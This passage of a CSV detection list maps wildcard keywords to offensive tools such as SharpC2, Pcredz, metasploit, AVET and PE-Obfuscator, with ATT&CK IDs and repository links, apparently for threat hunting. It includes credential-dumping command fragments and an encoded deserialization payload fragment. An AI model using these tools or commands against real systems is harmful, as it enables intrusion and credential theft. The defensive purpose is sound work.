Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" +"*PayloadFormat.ASSEMBLY*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadFormat.DLL*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadFormat.EXE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadFormat.POWERSHELL*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadFormat.SHELLCODE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadFormat.SVC_EXE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*payloadgenerator.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*payloads/Follina*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*payloads/Powershell*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*payloads/shellcodes*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*payloads_examples*calc.js*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*payloads_examples*calc.xll*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*PayloadsAllTheThings*","offensive_tool_keyword","PayloadsAllTheThings","A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! ","T1210 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/PayloadsAllTheThings","1","1","N/A","N/A","1","4","4","2019-02-11T06:34:14Z","2019-02-11T06:29:45Z" +"*PayloadService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*--payload-type Macro*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*PayloadType.BIND_PIPE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadType.EXTERNAL*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadType.HTTP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadType.REVERSE_TCP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*--payload-url */pwn.html","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" +"*pcap_linktypes.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*pcap2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pcapfile.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*PcapXray*","offensive_tool_keyword","PcapXray","Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.","T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048","TA0001 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Srinivas11789/PcapXray","1","1","N/A","N/A","10","1501","270","2022-03-28T15:31:26Z","2017-10-02T04:47:51Z" +"*pcienlhnoficegnepejpfiklggkioccm*","greyware_tool_keyword","Cloud VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Pcredz -d *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" +"*Pcredz -f *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" +"*PCredz -f *.pcap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Pcredz -i *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" +"*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*pdbedit -L -v*","greyware_tool_keyword","pdbedit","Sets the smbpasswd listing format. It will make pdbedit list the users in the database - printing out the account fields in a format compatible with the smbpasswd file format.","T1003.003 - T1087.001","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*pdbedit -L -w*","greyware_tool_keyword","pdbedit","Enables the verbose listing format. It causes pdbedit to list the users in the database - printing out the account fields in a descriptive format","T1003.003 - T1087.001","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*PDF_Payload*Doomfist.pdf*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*pdf2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pdfcrack -f *.pdf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PDONUT_INSTANCE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*pe_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*pe_packer/dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe_packer/exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe_packer/main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe_packer\dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe_packer\exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe_packer\main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe_packer_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe2sh.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*pe2shc.exe *","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*pe2shc.exe*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*pe2shc_*.zip*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*Pe2Shellcode.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*PEASS-ng-master*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*peCloak*","offensive_tool_keyword","peCloak","peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool","T1027.002 - T1059.003 - T1140 - T1562.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py","1","0","N/A","N/A","1","97","39","2016-03-21T23:38:15Z","2015-08-19T14:46:50Z" +"*peinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*peinjector.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PELoader/PeLoader.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*pem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Pennyw0rth/NetExec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*-pentest*","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PentestBox*","offensive_tool_keyword","pentestbox","PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System","T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://pentestbox.org/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PENTESTING-BIBLE*","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","10","12397","2308","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z" +"*pentest-machine*","offensive_tool_keyword","pentest-machine","Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.","T1583 - T1584 - T1580 - T1582 - T1574","TA0002 - TA0001 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/DanMcInerney/pentest-machine","1","1","N/A","N/A","4","315","106","2018-09-07T20:01:41Z","2015-02-26T23:57:21Z" +"*pentestmonkey*","offensive_tool_keyword","Github Username","github repo name - privileges exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PE-Obfuscator.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*PE-Obfuscator.git*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*PE-Obfuscator-main*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*Pepitoh*VBad*","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","N/A","6","511","134","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" +"*perfdata.portswigger.net*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PerfExec.sln*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"*PerfExec-main.zip*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - 